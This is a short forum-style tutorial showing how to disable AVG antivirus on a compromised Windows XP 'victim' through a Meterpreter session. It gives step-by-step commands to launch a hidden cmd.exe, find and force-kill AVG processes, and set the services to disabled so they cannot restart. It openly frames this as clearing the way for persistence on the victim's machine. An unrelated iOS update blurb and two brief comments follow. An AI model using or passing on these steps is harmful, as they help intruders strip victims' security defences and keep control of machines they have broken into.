Hello Friends …
My name is Suresh Senarathna and this is my first "How-To" post,
Now I am going to show you how to stop all antivirus services after got meterpreter session in your victim,
(I'm using MS windows Xp as my victim OS and AVG Antivirus guard as an example)
In meterpreter session we can use "killav" command to kill AVG services which running in victim's PC, but it will not stop all running services of AVG ,
So we going to use "taskkill" command to stop all ruining avg services,
1) First type:
execute –f cmd.exe –c –H
In meterpreter terminal , it will execute hidden cmd on our victim OS.
then type,
interact n
(n=channel number) to interact with it.
2) Then type:
tasklist /SVC | find /I "avg"
to find what are the running AVG services.
3) After it type:
taskkill /F /IM "avg"
to kill those running services,
But as you can see all those services are not terminated, because some of them are restart itself and those are unable to stop,
4) To verify it type:
sc queryex (service name)
5) So we had to stop those services auto-starting itself.to do that, type:
sc config (service name) start=disabled
6) Then do taskkill again,
taskkill /F /IM "avg"*
7) Finally type:
tasklist /SVC | find /I "avg"
to verify all avg services are terminated….
Now all the running and auto-starting AVG services are terminated.
So you can create persistence or any other fun things with out having any antivirus guard problem,
(P.S : is any thing I have done wrong way plz correct me, thanks for reading)
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
2 Comments
You... don't need admin privileges?
When he launched the cmd.exe, it's pointing directly into the windows/system32 , so I think he used a high integrity process meterpreter.
Share Your Thoughts